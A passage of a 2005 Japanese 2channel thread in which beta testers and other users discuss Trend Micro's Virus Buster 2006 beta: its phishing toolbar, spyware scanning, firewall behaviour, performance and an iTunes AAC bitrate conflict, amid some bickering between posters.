遠い過去レスで何度か書いてたんだけどね。
今更レスアンカーは紹介しない。
過去に普通に対話していた人たちと、数日前に対立してた可能性もあるしw


248 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:50:34
あーあ。コテハン化しちゃった。
むんむんたん降臨きぼん。

249 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:55:14
>>229
http://pc8.2ch.net/test/read.cgi/sec/1128089990/15
>>213
http://pc8.2ch.net/test/read.cgi/sec/1117601684/161

各スレを荒らしてる病人が
バスタースレにも常駐してる感じだわ。

250 :名無しさん@お腹いっぱい。:2005/10/04(火) 22:57:56
しかし本スレには居ない。
これ如何に?

251 :131:2005/10/04(火) 23:03:06
荒れてるところ申し訳ありませんが、私は本題の方を・・・。

フィッシング詐欺対策では専用の設定ウィザードがある。
URLチェックのみならず、SSLチェックも行なわれ、ツールバーに表示される。
出来れば火狐やOperaにも実装できるようにしてほしい。

だが・・俺個人はイラネ。
他にツールバーがあるし、これ以上ブラウジングスペースを狭くしたくない。
表示方式を複数選択できるようにしてほしい。


252 :131:2005/10/04(火) 23:06:07
3年前のPCでは重い。
2004や2005だって全ての機能を有効にすれば、かなり重くなってしまうわけだが、オマケ機能に過ぎなかったので
無効のままにしておけば済んだし、特別問題視されることは無かった。

でも2006からはどうだろうか?
効果的な機能に進化したから、利用率が高くなり、必然的に「重さ」に気付くユーザーが増えるだろう。

ロギングもかなり変化してるな。


253 :名無しさん@お腹いっぱい。:2005/10/04(火) 23:08:44
最近になって付き始めた機能はねぇ。
昔、メール検索が付き始めた頃にサポートするMUIがOutlookと同Expressだけだった
状況に似ていなくも無い。

ファイアウォールはどうっすか?

254 :253:2005/10/04(火) 23:10:18
×MUI
○MUA

こんな言葉はもう誰も使わんなorz

255 :131:2005/10/04(火) 23:24:50
謎の言葉をe-wordsで調べてしまった・・・。

ロギングの変化といえば、迷惑メール関係でマカフィーばりの図解表示がある。
ファイアウォールはよく分からない。
が、ハッシュチェックは効果的かもしれない。

256 :名無しさん@お腹いっぱい。:2005/10/04(火) 23:28:52
デフォルトでアウトバウンドも監視してますかね?
それとも相変わらず素通りですか?
スキャンの方が完璧ならアウトバウンドなんか良いのかも知れないけど、
残念だけどそうじゃないからね。

257 :名無しさん@お腹いっぱい。:2005/10/04(火) 23:30:10
しないよ

258 :213:2005/10/04(火) 23:31:35
>>249
残念、それは俺ではないな
くっくっく。。。

259 :名無しさん@お腹いっぱい。:2005/10/04(火) 23:34:57
>>257
どうも。
やっぱり自分で何とかするしかないかぁ。
ぞね辺りを個人的に入れたほうが管理もし易いし良いかもなぁ。
機能もウイルスバスターのものと大して変わりが無いし。

260 :131:2005/10/04(火) 23:41:04
>>257
あれれっ。
俺の記憶ではデフォでダイアログが出てた気がするのだが・・・。
で、テスター失格の謗りを覚悟で、直後にPFWはアンインスコ。
いつものPFWに切り替えた。

いや。バスターのPFWを信用していないのではなく、使い慣れてるやつに回帰しただけです。。。


261 :名無しさん@お腹いっぱい。:2005/10/05(水) 00:19:10
「荒れると急にマトモっぽいレスでスレが伸びるのはなぜなのママ?」
「それはね、このスレには>>1さんとVipperさんしかいないからよ。」
「なあんだ、じゃあこんなスレ要らないね。」
「そうね、さ、今日はもうお休みなさい。」
「おやすみ、ママ。」

262 :名無しさん@お腹いっぱい。:2005/10/05(水) 00:27:59
マジレスは毎日あるのに、アホな妄想に走ってる>>261を発見しますた。
速やかに駆除されてください。

263 :名無しさん@お腹いっぱい。:2005/10/05(水) 00:56:09
>>261
マジレス比率がおそろしく低いスレッド。
レスを伸ばしてるのは、荒らしの君達だよ。

264 :名無しさん@お腹いっぱい。:2005/10/05(水) 02:19:26
そういううちに、あと15日になりました

265 :名無しさん@お腹いっぱい。:2005/10/06(木) 04:10:13
その前にアンインスコしちゃった俺って・・?

266 :131:2005/10/06(木) 07:16:55
>>265
俺もだよw

267 :名無しさん@お腹いっぱい。:2005/10/06(木) 10:31:05
なんだ。今までのレポートは妄想だったのか。
真面目に読んで損したorz

268 :マジ1:2005/10/06(木) 12:00:18
おれは、まだ使用中wwwww

269 :131:2005/10/06(木) 14:04:15
>>267
テスター続けるのに飽きたから、途中でアンインスコしただけ。
お前、頭大丈夫か?
俺のレスが単なる妄想だなんて、いつどこで自白したんだよ?
お前こそ妄想癖があるだろ。
そのへタレ頭脳こそ深刻なセキュリティホールだよ。

リポートした分は実体験で書いている。そんなの当たり前だろうが。
俺の一連のレスは、機能紹介と使用感の感想が中心だっただろ。
そんなもん過去の体験を思い出すだけで容易に書ける。
リアルタイムの体験は、絶対条件ではない。


270 :名無しさん@お腹いっぱい。:2005/10/06(木) 14:09:21
何ムキになってんだよ
いちいち反応せずスルーしろよ

271 :131:2005/10/06(木) 14:11:18
まったく・・>>267みたいな馬鹿まで相手にしなければならないわけだから、人に正しく理解させるのはホントに困難だな。
俺の一言をどんな風に解釈すれば、「虚偽の妄想リポート」に繋がるのか。
こんなアホの妄想、想像力には責任が持てないね。

272 :131:2005/10/06(木) 14:14:54
>>270
スルーすれば良いという単純なものでもない。
荒らしや煽りをスルーするのとはワケが違う。
なんでもかんでも一緒くたに考えるお前はアホか。

「虚偽」か「真実」かは重大な要素であり、
馬鹿の一言が原因で、一部のロムラーに誤解が広がる可能性があるならば、
事実を説明する必要がある。


273 :名無しさん@お腹いっぱい。:2005/10/06(木) 14:44:57
なんだこいつ

274 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:12:45
ワーイ、釣れた釣れた
またお祭りだー!

275 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:18:16
こんなんで釣れた釣れたと歓喜してるガキは
友達がいないのかな。
退屈な毎日で、2ちゃんの祭りに期待するしかないと。

276 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:23:11
あほばっか

277 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:24:44
>>273>>276
ツマンネー1行レスで、いちいちageてる藻前が
最大級の阿呆だな。

278 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:29:27
いちいちレス返して2ちゃん新参か┐(゚〜゚)┌

279 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:33:38
レス伸びてるなと思ったらアホくさ

280 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:42:30
>>278
いちいち参加してるオマイは2ちゃん新参か┐(゚〜゚)┌

281 :名無しさん@お腹いっぱい。:2005/10/06(木) 15:47:26
釣りだかマジだか知らんけど
今回の引き金は>>267の阿呆レスだったようだな。

282 :名無しさん@お腹いっぱい。:2005/10/06(木) 18:23:23
自分を悪く言われたからって、スルーできなく粘着質になる人は
2ちゃんやめたほうがいいよ、と歴史は語っている。事件起こす前に。

283 :名無しさん@お腹いっぱい。:2005/10/06(木) 18:49:18
>>282
肝心の131は数レスで引いてるんだよ?
しつこく延々、長々と話を引き摺ってるアンタ達こそ
ウザイし迷惑だし粘着質でしょう。

284 :名無しさん@お腹いっぱい。:2005/10/06(木) 19:52:22
>>283
131、乙  ( ´,_ゝ`)

285 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:13:30
このスレ、本来の目的はベータテスターを囲みながらベータ版を語るスレだったよね。
もう、このスレ だ め ぽ 。

286 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:18:02
もともとベータ版のデータなんか
一般ユーザーには役立たないだろ。
正規版が出れば、イヤでも新機能や使い心地が分かるし。
ベータ専用スレの存在そのものが不自然だよ。

287 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:22:22
>>284
見事に反応しましたね。
相手の正体を見極める能力もないくせに、
粘着力だけは秀でてますね。
乙です。

288 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:25:16
それはそうかもしれないけど、でも、事前にメーカー発表の情報以上の
細かい情報が分かっているに越したことは無いでしょ?

289 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:34:55
>>288
それならそれで、うだうだ愚痴を垂れないことだ。
その陰鬱な気分が、読み手に移るから。
あんたも駄スレ化に加担してることに気付け。

もちろん俺もだ。

290 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:48:26
オレ マダ ベータ バン ツカテル ヨ

291 :名無しさん@お腹いっぱい。:2005/10/06(木) 20:58:29
>>289
ごめんぽ。

ところで、無料アップグレードのダウンロード開始日時っていつかな?

292 :291:2005/10/06(木) 22:21:54
トレンドマイクロのプレスリリースを読んでたら10月20日から先行ダウンロード開始ってあったよ。
>>1にもそう書いてあるし・・・。
何やってんだろう。もう寝よう。

293 :名無しさん@お腹いっぱい。:2005/10/06(木) 22:26:11
この板もID導入してもらいたいものだ
行動起こすかな

294 :名無しさん@お腹いっぱい。:2005/10/06(木) 22:37:39
無料アプグレ前に2006はアンインスコせにゃならんの?

295 :名無しさん@お腹いっぱい。:2005/10/06(木) 23:42:58
>>294
もちろん。去年もそうだった。

296 :名無しさん@お腹いっぱい。:2005/10/07(金) 00:22:31
>>295
2004から2005なら、2005インスコラが勝手に判断して
2004アンインスコ -> 2005インスコ
ってな具合じゃなかったっけ?
ベータ版だと自分でアンインスコしないとダメなのけ?

297 :名無しさん@お腹いっぱい。:2005/10/07(金) 00:51:28
>>296
おれそういう風に使ったことないけど
OSの深いところにまで働くセキュリティーソフトたるものを
アンインスコした時に再起動なしでいいものか?
それは勝手に再起動して、立ち上げ後に勝手にインスコしてくれんの?(Windowsのうpグレードみたいに

そういうえば、2006のアンケートでベータ版をインスコする時
2005をアンインスコした、しない、の項目があった気しる

298 :名無しさん@お腹いっぱい。:2005/10/07(金) 00:58:00
>>297
いや覚えてないのよ。どーだったっけなー?
アンケートにはあったね。確かに。
2005をアンインスコしてベータをインスコしろって書いてあったから
素直にそのとーりにしてたけど、どうでもよかったのかしらん?

299 :名無しさん@お腹いっぱい。:2005/10/07(金) 03:08:16
つーか、干渉問題を考えたら、
普通にアンインスコすべきだろ。

300 :名無しさん@お腹いっぱい。:2005/10/07(金) 05:55:33
>>299
つーか、干渉問題なんて誰も言ってない罠。
スレの流れ読めてない、バスター使いじゃない、のいずれかだな、おまえ。
アンインスコせずにインスコするのは無理なんだし。

301 :名無しさん@お腹いっぱい。:2005/10/07(金) 12:09:51
攻撃的な人が多いね。
テスターがこのスレに集まらない理由が分かるよ。

302 :名無しさん@お腹いっぱい。:2005/10/07(金) 13:26:15
テスターが敬遠してしまう屑スレ。

303 :名無しさん@お腹いっぱい。:2005/10/07(金) 13:28:53
ここに書き込むためにテスターしてるわけではないし

304 :名無しさん@お腹いっぱい。:2005/10/07(金) 13:58:34
そもそもテスターってそんなに多いのか?

305 :名無しさん@お腹いっぱい。:2005/10/07(金) 14:41:11
2005スレでは祭りみたいに北北逝ってるけど
2006ベタのおいらには何も来てません。

306 :131:2005/10/07(金) 14:53:11
自動復旧機能が、メイン画面で設定できるようになったのは評価できると思う。
まー、役立つ時が来ない方が平和ではあるが。


307 :131:2005/10/07(金) 16:53:25
他社のフィッシングへの対応を見ても、
2006年版からようやく本格的な対応を始めたようだ。
現行版は、各社共にオマケ機能でしかない。

「その時流行したり、業界で騒がれてるものを取り入れるのは、ビジネスとしては正解だが、
真のセキュリティ向上になるかは疑問である」
e-Eyes Digital Security マーク・マイフレット

308 :名無しさん@お腹いっぱい。:2005/10/07(金) 18:03:26
真のセキュリティ向上になるかは疑問である か。

非生産的な批判ばっかり言う評論家の存在ほど、疑問なものはないけどね。

309 :名無しさん@お腹いっぱい。:2005/10/07(金) 20:52:09
>>308
e-Eyes Digital Securityは米国の新興セキュリティ企業。
社長のマーク・マイフレットは、17歳で起業した人で、例のUPnPの脆弱性やコードレッドの発見など、
大手企業に匹敵する脆弱性発見の実績を挙げた。
但しアンチウィルスは開発していないようだな。

まあ、どんな分野にも言えることだが、
本質を忘れて、流行ばかり追いかける姿勢に疑問を感じた故の
コメントだろうと思われる。


310 :名無しさん@お腹いっぱい。:2005/10/07(金) 20:58:49
すでに話題が正常になりつつあるので、名無しに戻らせていただいた。

311 :名無しさん@お腹いっぱい。:2005/10/07(金) 20:59:56
本質で飯が食えれば問題ない。

312 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:14:28
流行を取り入れるのが駄目という意味ではなく、
目先の流行現象に惑わされず、セキュリティに最も必要な本質的問題を、根本的アプローチで解決して行く・・という意味だろうな。
とはいえ技術者でもない自分が、具体的に何が本質的なのかは分からない。
各社で見解が異なるだろうし、それがビジネスビジョンだろうし。

本質を無視した誠意の無い企業こそ、今後は淘汰されてゆくだろうな。


313 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:29:46
>>308>>311
>非生産的な批判ばっかり言う

自己批判ですか?
お疲れさまです。

314 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:33:41
・・・こうして戦いは続くのであった





                    − 糸冬 −
                   製作著作 NHK

315 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:36:51
なんか最近重い気がする。
テレビ視聴ソフト立ち上げると重い。
早く20日にならないかなあ。ついでにリカバリして、2006入れよ。

おれは生産的だなw

316 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:38:28
御自分の非生産的行為を棚に挙げて
いちいちケチ付けたがるお馬鹿さんが
いるからでしょうね。
こーゆーのに限って何もできない無能
なんですよ。

え、私もですか?
しつれいしました。

317 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:43:32
131うざい

318 :131:2005/10/07(金) 21:52:08
もうね・・また名前に最初のレスアンカー入れとくか。
ややこしい。

セキュリティに限らず、どんな分野でも、
目先の利益に執着し過ぎると、長期的には大損をこいたり、ユーザーや社会に迷惑をかけることはよくあること。
とはいえ>>307>>309は、俺の意見ではなく、e-Eyes Digital Securityのを参考的に紹介しただけなので、「生産的」な案の持ち主は、そちらに訴えてみたらどうだろう?w

>>315
ビデオボード関係は?


319 :名無しさん@お腹いっぱい。:2005/10/07(金) 21:54:28
308=311=317
負け犬の遠吠え、乙。

320 :131:2005/10/07(金) 21:57:55
個人的にはWeb Trapみたいなのを、また復活させてほしい。
あれは重くなりすぎて糞だったが、今の技術なら何とかなるだろうと・・・。
オミトロンとの干渉には今更文句は言わないけどね。

321 :317:2005/10/07(金) 22:08:05
>>319
残念
俺今日初カキコだぜ
帰宅して1日分のレス見てた

322 :名無しさん@お腹いっぱい。:2005/10/07(金) 22:10:02
ここってベータテスター一人しかいないのかな?
こういうのってどうしても主観が入るから、
一人だけのレポートって悪いけどあまり信用できないんだよね。
他の人のレポートも欲しい。

323 :名無しさん@お腹いっぱい。:2005/10/07(金) 22:12:11
131のレス抽出してみたら40くらいあるな
しかも長文ばかり、よくやるよ

324 :名無しさん@お腹いっぱい。:2005/10/07(金) 22:12:32
>>322
過去ログ嫁。

325 :名無しさん@お腹いっぱい。:2005/10/07(金) 22:15:20
>>322
普通に何人もリポートしてたが。

326 :名無しさん@お腹いっぱい。:2005/10/07(金) 22:34:58
書き尽くしてるだに
これ以上なにを書けと

327 :名無しさん@お腹いっぱい。:2005/10/07(金) 23:11:55
マジレス乙。

328 :名無しさん@お腹いっぱい。:2005/10/08(土) 01:39:06
今ふつうに2006βを使ってるんだが・・・
なんかきもい奴がスレのヌシ化していて、出辛いのでずっと黙ってました。
まぁどうせ近々先行DLも解禁になるし、黙ってても使えるようになるから、
もうレポも要らんでしょ。

329 :名無しさん@お腹いっぱい。:2005/10/08(土) 01:56:28
>>328
ンだから中傷(余計な一言)はヤメレって。
荒れるし。
そんな事も分からない藻前もキモイよ。

330 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:00:46
>>318
文句があるわけじゃねえけど
自分で書いといて、あとで記事紹介しただけですから
は、おれだったら言わない罠

オンボードだし。ドライバもおかしくなってる様子ないし。
持ち主が調子悪いとPCも調子悪い的なものか。

331 :131:2005/10/08(土) 03:16:13
>>330
例の若社長の信念は、共感できるものもあったから、自分の考えもその線で述べた。
だが、例によって、俺のレスというだけで粘着する馬鹿タレが出てきたため、
またゴタゴタが長引く前に、さっさと引き上げようとしただけだ。

あなたが言わないのは自由。
でも俺は言う。
どちらも自由。
それでいいじゃん。

332 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:18:50
>>330
蒸し返すなよ。
うんざりだ。

333 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:19:21
一歩、遅かったか。。。。

334 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:23:47
まあ、そうなんだけど
成功したら、自分の手柄。
失敗したら、おれがやったんじゃねえ。
的なのは、卑怯かなと思っただけ。

名前欄は空欄でいいじゃん。
そんなにしたいなら、トリップ付けてコテハンにすればいいと思われ。

335 :330&334:2005/10/08(土) 03:25:31
スマナイ。
またまたスマナイ。
もう寝るか。

336 :131:2005/10/08(土) 03:30:30
なんじゃ、成功と失敗って?w
読めば普通に分かると思うが。
単なる翻訳てぜ終わらず、共感できるが故の意見も述べた。
失敗云々じゃねーんだよ。
俺のレスというだけで粘着するキモオタをいい加減、振り払いたかっただけ。
他意はない。
あんな粘着相手に成功も失敗もねーよ。

337 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:33:15
おまいら全員消えろ。
うだうだツマランことで、まったくもう。

338 :名無しさん@お腹いっぱい。:2005/10/08(土) 03:46:41
|  |
|  |∧_∧
|_|´・ω・`) そ〜〜・・・ 
|桃|o旦 o       
| ̄|―u'
""""""""""
"
|  |  よかったらどうぞ
|_|  どうぞ、マッタリね
|桃| ミ
| ̄|     旦  
""""""""""""""""

339 :名無しさん@お腹いっぱい。:2005/10/08(土) 17:06:54

http://pc8.2ch.net/test/read.cgi/sec/1128666331/40


340 :名無しさん@お腹いっぱい。:2005/10/08(土) 19:56:10
まじめな話題をふたつ
2005にあったスパイウェアの簡易検索はなくなったみたいだね。あんなの意味ないしね。
検索時間が数十秒くらい短縮されてもねえ。

ウイルス検索すると、自動的にウイルス&スパイウェア検索になるんだね。
そのほうがいいかもね。

341 :名無しさん@お腹いっぱい。:2005/10/08(土) 20:54:10
ノートンやマカフィーではスパイウェア対策機能がかなり強化されているようですが、
バスターはその点どうなんでしょうか?

342 :名無しさん@お腹いっぱい。:2005/10/08(土) 21:41:26
>>341
>>340の意味では2005より強化されてると言える。設定もデフォで全選択になってるし。
機能でなくて、運用を強化したにすぎないかもしれんが。

343 :美代子:2005/10/08(土) 21:44:01
バスター使ったのに彼氏が出来ません。
どうしたらいいですか?

344 :名無しさん@お腹いっぱい。:2005/10/08(土) 21:44:42
お前ホモかよ

345 :名無しさん@お腹いっぱい。:2005/10/08(土) 21:52:31
男に筋肉バスターとかブレーンバスターとか使ったんだろ。
そんな女だったら逃げるよ。彼氏が出来るわけねエ

346 :131:2005/10/08(土) 22:08:10
最近のオンラインスキャンでは、スパイウェアも合わせてスキャンしてくれる所が増えたね。
(スパイウェアに特化したサービスもある)

でも酷いやつもある。↓
http://www.drivedata.jp/virus_ex.html
IEの制限付きゾーンに登録した情報まで、スパイウェア扱いするのだ。


347 :131:2005/10/08(土) 22:09:51
>>341
除外設定や復元機能が付いたので、価値は高まったといえる。
スパイウェア定義は、トレンド、マカフィー、氏万テック・・・各社そろって大幅に増やすようだ。
まあスパイウェア専用ツールには及ばないと思うけどね。

ただ専用ツールで営業してるベンダーは、定義数の多さを過剰にアピールしてる所があって胡散臭い。
元々グレーゾーンに属するものが多いから、各ユーザーで異なるし、単に多ければ良いというものではないよね。


348 :131:2005/10/08(土) 22:12:33
>>343
スパイウェア対策とプライバシー保護機能を、無効にしてください。

PFWも切って、トロイに狙われやすいポートを開いておけば完璧。


349 :名無しさん@お腹いっぱい。:2005/10/08(土) 23:57:04
↑こいつうざい

350 :名無しさん@お腹いっぱい。:2005/10/09(日) 00:27:35
・・・そして、また、新たなる戦いが始まる・・・




                       − 糸冬 −
                     製作著作NHK・大阪

351 :名無しさん@お腹いっぱい。:2005/10/09(日) 00:42:15
>>349
おまいがウザイのはよく解ってるから消えていいよ

352 :名無しさん@お腹いっぱい。:2005/10/09(日) 05:00:57
もう障害報告とか終ってたのか〜

353 :112:2005/10/09(日) 06:02:48
現在、サポートとのやりとりで原因を調べてます。
(原因の切り分けができたかな?という段階)

有名なソフトで自分にとっては必要不可欠。
そしてこれからもウイルスバスターを使い続けたいので・・・
サポートの対応はとても丁寧です。

2005→2006β→2005の作業、4回もした(´・ω・`)

354 :名無しさん@お腹いっぱい。:2005/10/09(日) 19:35:00
>>348
(*´Д`*)

355 :名無しさん@お腹いっぱい。:2005/10/09(日) 19:54:44
ベータテスト参加メール来たけど
もしかしたら電話するかもしれないよ
の一文にびびって申し込みできなかったヒキコモリの俺様

356 :名無しさん@お腹いっぱい。:2005/10/09(日) 20:18:14
>>355
出なきゃいーじゃん。
42になる電話恐怖症の俺は、家の電話も会社の電話もいっさい出ない。(いばるな)

357 :名無しさん@お腹いっぱい。:2005/10/09(日) 20:21:38
携帯も持ってないの?

358 :名無しさん@お腹いっぱい。:2005/10/09(日) 20:24:14
↑こういう言い方は例え持っていてもむかつくんだよな

359 :名無しさん@お腹いっぱい。:2005/10/09(日) 20:36:20
>>357
携帯はメール専用機だ。
電話は嫁と子以外からは出ん。

360 :名無しさん@お腹いっぱい。:2005/10/09(日) 23:20:25
そういうわりに仕事は電話セールスだったら、人間のクズだな

361 :名無しさん@お腹いっぱい。:2005/10/09(日) 23:57:30
いいや、SEだ。

おっと、人間のクズという意味では同じか(w

362 :名無しさん@お腹いっぱい。:2005/10/10(月) 07:27:23
いよいよあと10日だね

363 :名無しさん@お腹いっぱい。:2005/10/10(月) 08:35:57
iTunesにAACでCDを取り込むときにビットレートの変更ができなくなってたんだけど、
ウイルスバスター2006βを一度終了させたら直った。

364 :名無しさん@お腹いっぱい。:2005/10/10(月) 08:56:37
>>362
楽しみ。インスコが面倒だけど。

365 :名無しさん@お腹いっぱい。:2005/10/10(月) 11:03:21
>>363
そういうのをちゃんとフィードバックしてやれよ
2chに書くだけじゃなく
そのためのベータだからな

366 :112:2005/10/10(月) 14:56:46
>>365
実はiTunesのAACのビットレート変更でサポートとやりとりしてます(汗

367 :名無しさん@お腹いっぱい。:2005/10/10(月) 15:42:31
>>366
がんがれ。

368 :名無しさん@お腹いっぱい。:2005/10/10(月) 17:55:55
よくわからんが、単なるファイアウォールの許可の問題じゃないのか?
CDのタイトルや曲名をネットに取りに行くのをバスターが遮断してるだけとか。
違ってたらスマンがの。

369 :363:2005/10/10(月) 20:08:33
iTunesで、AACのビットレートを128kbpsから他のビットレートに変更できなかったんだが、
ウイルスバスター2006βを終了(アンインストールではない)させたら、ちゃんと変更できる
ようになった。その後、ウイルスバスター2006βを起動させたら、やっぱりビットレートの変
更はできた。パソコンを再起動させたが、やっぱりビットレートの変更はできた。
ウイルスバスター2006βをアンインストールしてから再インストールしたらどうなるかな?と
思ったが、じゃまくさいので止めた。出かけないといけなかったし・・・。とりあえず、2ちゃんに
書いてみた。
以上、状況報告でした。

370 :名無しさん@お腹いっぱい。:2005/10/10(月) 20:21:53
一時的にPCが不安定になっただけじゃないの。
再起動させたら直ったってことでしょ。
不正な使い方したのでソフトが落ちてたってとこで。

371 :363:2005/10/10(月) 20:23:54
明日、アンインストール→再インストールして症状が再現できたら、トレンドに報告します。
今日は、さっき帰ってきたばっかりで疲れているので。

372 :363:2005/10/10(月) 20:26:07
>>370
何回もパソコンを再起動させてできなかったんですよ。
まあ、元々調子の悪いパソコンだけど・・・
ちなみにWindows2000です。


373 :名無しさん@お腹いっぱい。:2005/10/10(月) 20:50:41
深く考えることないんじゃね?おれはそう思う。
だって結局できたんでしょ?バスター起動させたまま。
iTunesはマイナーじゃないし、クイックタイムの最新バージョンと考えれば微妙にかなりマイナーだが。
気にしない気にしない。

374 :112:2005/10/10(月) 20:54:01
iTunesはAAC変換のみの使用で通信させる必要ないので
スタートアップとサービスを止めてます。VB2005と同じPFWの設定です。

PCCToolでPFWをアンインストールすると変換できるようになります。
(PFW無効だとできない)
VBを終了させると変更できるんですが
VBを再起させるとまた変更できなくなるのが363氏と違いますね。

↑の検証結果と添付してほしいと言われたものを添付して返信しました。
現在解析中だそうです。なおるといいですねぇ。。

375 :112:2005/10/10(月) 21:17:01
自分はパソコンを再起させてもVBを終了→再起させても
PFWをアンインスコ→再インスコしてもVBを通常起動している限り変更できません。

環境はWindowsXP SP1
とても調子のいいパソコンです。

376 :名無しさん@お腹いっぱい。:2005/10/10(月) 21:29:11
sp2にしたら、直るかも。
sp2にするとIEも新しくなるみたいだし。ファイアウォールとIEはなにかと影響受け合うでしょ。

sp2もアンインスコできるんだし、失敗しても保証も謝罪もしないけど。

377 :名無しさん@お腹いっぱい。:2005/10/10(月) 21:47:32
iTunesの名前が出てきて、また入れてみようかなと思った。
前に入れたときは光学ドライブが仮想も含めて全て見えなくなって、Windowsを再インストール。
iTunesは窓の外に投げた。
で、さっき5.01を入れたら何とも無い。
試しに手持ちのCDをAACにエンコードして携帯に転送して曲聞いてみた。

最高に良いわ、これ。
iPod nanoも欲しくなってきたw
iTunesの話題を出してくれた人に感謝します。

378 :363:2005/10/10(月) 22:13:57
おいおい、たった今確かめてみたら、またできなくなってたよ。

iPodをFireWireで接続していない状態
VB2006βを起動した状態でiTunseを起動→AACのビットレートを128kbpsから他のビットレートに変更できない。
→VBを終了して、iTunesをいったん終了した後で再起動→ビットレート変更ができるようになる→VBを再起動→ビットレー
ト変更がまたできなくなる。

iPodをFireWireで接続した状態
VB2006βを起動した状態でiTunseを起動→AACのビットレートを128kbpsから他のビットレートに変更できない。
→VBを終了して、iTunesをいったん終了した後で再起動→ビットレート変更ができるようになる→VBを再起動→ビットレー
ト変更ができるまま(ここが違う)

明日トレンドに報告しときます。今日は疲れたから風呂は入って寝る。

379 :名無しさん@お腹いっぱい。:2005/10/10(月) 22:52:57
ベータ版ってどこでダウンロードしたらいいの?

380 :名無しさん@お腹いっぱい。:2005/10/10(月) 23:16:39
>>379
おまいは過去レスも読めないのかと。

381 :名無しさん@お腹いっぱい。:2005/10/10(月) 23:30:58
過去レスになんか書いてあるか?

382 :名無しさん@お腹いっぱい。:2005/10/10(月) 23:36:05
テスター依頼があった人だけの特権。

383 :名無しさん@お腹いっぱい。:2005/10/10(月) 23:38:25
なるほど、そういうことか。

384 :名無しさん@お腹いっぱい。:2005/10/11(火) 01:16:59
Meだがリソースまた大食いになってますか?
2005の方がいいだろうか

385 :名無しさん@お腹いっぱい。:2005/10/11(火) 08:41:41
>>382
ていうか、まずこっちからテスター希望を出すんだけどね。

386 :名無しさん@お腹いっぱい。:2005/10/11(火) 18:09:00
2006β入れると、iTuneのAACビットレート変更出来ないの気付いたの一昨日なんだけど、
障害報告終ってて何処に報告したら良いのか分からんくて放置してた。
今から報告できるなら、したいと思うが何処にやりゃ良い?

387 :名無しさん@お腹いっぱい。:2005/10/11(火) 21:03:09
>>385
案内。

388 :名無しさん@お腹いっぱい。:2005/10/12(水) 11:00:38
>>386
サポートでいいんじゃないか?
2006ベータもサポートすると書いてあった気がしたし。
そもそも無サポートでベータテストなんか無意味だし。
悪いとこ教えてよってのがベータテストなんで。
その期間終わってるの?アンケートは終わったけど。

389 :名無しさん@お腹いっぱい。:2005/10/12(水) 12:44:30
フィルター機能を久しぶりに使ってみたんだけど
導入当時よりだいぶ軽くなったような気がするだけど
どうですかね

390 :名無しさん@お腹いっぱい。:2005/10/12(水) 13:40:47
テスターに質問
2005よりオモイ?

391 :名無しさん@お腹いっぱい。:2005/10/12(水) 13:46:36
最初の方に書いてある

392 :名無しさん@お腹いっぱい。:2005/10/12(水) 14:02:32
ネットサーフィンしてる時以外は変わらないよ

393 :名無しさん@お腹いっぱい。:2005/10/13(木) 10:20:27
>>386
うちは問題なく変換できるよ
他のアプリじゃないの?

394 :名無しさん@お腹いっぱい。:2005/10/14(金) 09:48:52
いや変換は出来るんですがね

395 :名無しさん@お腹いっぱい。:2005/10/14(金) 15:42:15
>>388
この前までメイン画面の最新ニュースってとこからβ用障害報告ページに行けたんですけどね
もぅ無くなってるからなぁ

それよりネットサーフィンwしてるとフィッシング詐欺対策ツールバーが消える事があって
設定を確認すると「フィッシング詐欺対策ツールバーを使用する」のチェックが外れてる…
って事ないですか?

WinXP Home SP2 + IE6 SP2

396 :名無しさん@お腹いっぱい。:2005/10/15(土) 06:56:26
>>395
それはないな。
IEがいつも同じ大きさで開くわけじゃなく、HPによっていろいろと違う。
そういうのでボタン、メニューがないページもあるけど、そういう時はフィッシングがない場合はある(だろう)


397 :名無しさん@お腹いっぱい。:2005/10/15(土) 11:45:24
あと5日!

398 :名無しさん@お腹いっぱい。:2005/10/16(日) 08:34:30
あと4日、あと4日、あと4日、あと4日・・・・・・・・・

399 :395:2005/10/17(月) 07:36:13
マクロメディアのサイトうろうろしてたら又フィッシング詐欺対策ツールバー無くなったw

400 :399:2005/10/17(月) 23:42:39
URLフィルタのログ見たら、マクロメディア関係がスゲー引っ掛かってるんだけど
なぜ禁止なんだろう?

401 :名無しさん@お腹いっぱい。:2005/10/18(火) 10:15:03
あと2日でこのスレ終了?

402 :名無しさん@お腹いっぱい。:2005/10/18(火) 10:36:54
>>1
>このまま正式スレに移行しましょう。

403 :名無しさん@お腹いっぱい。:2005/10/18(火) 16:41:10
あと2日、あと2日、あと2日、あと2日・・・・・・・・・

404 :名無しさん@お腹いっぱい。:2005/10/18(火) 18:27:16
何時からダウソ開始?
毎年午前10時スタートだったっけ?

おれにとっちゃ、新作バスターはボジョレーヌーボーみたいなもんだな

405 :名無しさん@お腹いっぱい。:2005/10/18(火) 21:58:45
>>404
あ、オレもー。

406 :名無しさん@お腹いっぱい。:2005/10/19(水) 00:03:28
ボジョレーヌーボーはいい例えだねぇw

+   +      バスター2006・・・
  ∧_∧  +
 (0゚・∀・)   ワクワクテカテカ
 (0゚∪ ∪ +        
 と__)__) +



407 :名無しさん@お腹いっぱい。:2005/10/19(水) 08:50:48
ボジョレーと時期も似たり寄ったりだしね
10月か11月かの違いだけで

